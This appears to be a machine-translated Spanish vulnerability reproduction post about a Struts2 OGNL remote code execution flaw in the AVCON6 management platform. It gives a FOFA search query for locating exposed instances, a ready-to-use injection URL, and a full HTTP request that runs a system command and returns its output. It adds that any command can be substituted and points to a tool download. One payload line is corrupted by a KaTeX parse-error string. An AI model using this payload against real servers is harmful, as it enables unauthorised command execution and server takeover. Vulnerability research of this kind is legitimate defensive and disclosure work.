Directorio de artículos
La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código strut2
Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Las consecuencias adversas tienen nada que ver con el autor del artículo. Este artículo es sólo para fines educativos.
1. Introducción a la plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd.
Búsqueda de cuenta oficial de WeChat: Biblioteca de reaparición de vulnerabilidades de Nanfeng
Este artículo se publicó por primera vez en la cuenta oficial de la Biblioteca de reproducción de vulnerabilidades de Nanfeng
Warburg Pincus Information Technology Co., Ltd. es un proveedor de sistemas de comunicación multimedia y soluciones para ciudades inteligentes. La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código Strut2. Permita que los atacantes ejecuten comandos de forma remota y obtengan privilegios de servidor.
2. Descripción de la vulnerabilidad
Warburg Pincus Information Technology Co., Ltd. es un proveedor de sistemas de comunicación multimedia y soluciones para ciudades inteligentes. La plataforma de gestión del sistema AVCON6 de Warburg Pincus Information Technology Co., Ltd. tiene una vulnerabilidad de ejecución remota de código Strut2. Permita que los atacantes ejecuten comandos de forma remota y obtengan privilegios de servidor.
ID CVE:
ID CNNVD:
ID CNVD: CNVD-2020-30193
3. Afecta la versión
AVCON6
4. declaración de consulta fofa
título = "AVCON"
5. Recurrencia de la vulnerabilidad
漏洞链接: http://127.0.0.1:8800/login.action?redirect: Error de análisis de KaTeX: esperado '}', obtuvo 'EOF' al final de la entrada: …ction?redirect: {%23a%3d(new% 20java.lang.ProcessBuilder(new%20java.lang.String[]{“id”})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(% 23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony .xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Paquete de vulnerabilidad:
GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{"id"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}%20GET%20/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{"id"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: 127.0.0.1:8800
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
El comando id se ejecuta con éxito aquí, o puede cambiar el comando id al comando que desea ejecutar
También es posible utilizar la herramienta de vulnerabilidad de ejecución de comandos strut2 en el mercado.
6.POC&EXP
Siga la cuenta pública Nanfeng Vulnerability Reproduction Library y responda Vulnerability Reproduction 28
para obtener la dirección de descarga de la herramienta de utilización del comando strut2 mencionada anteriormente:
7. Opiniones de rectificación
El fabricante aún no ha proporcionado una solución de reparación; preste atención al sitio web del fabricante para obtener actualizaciones oportunas: http://www.avcon.com.cn/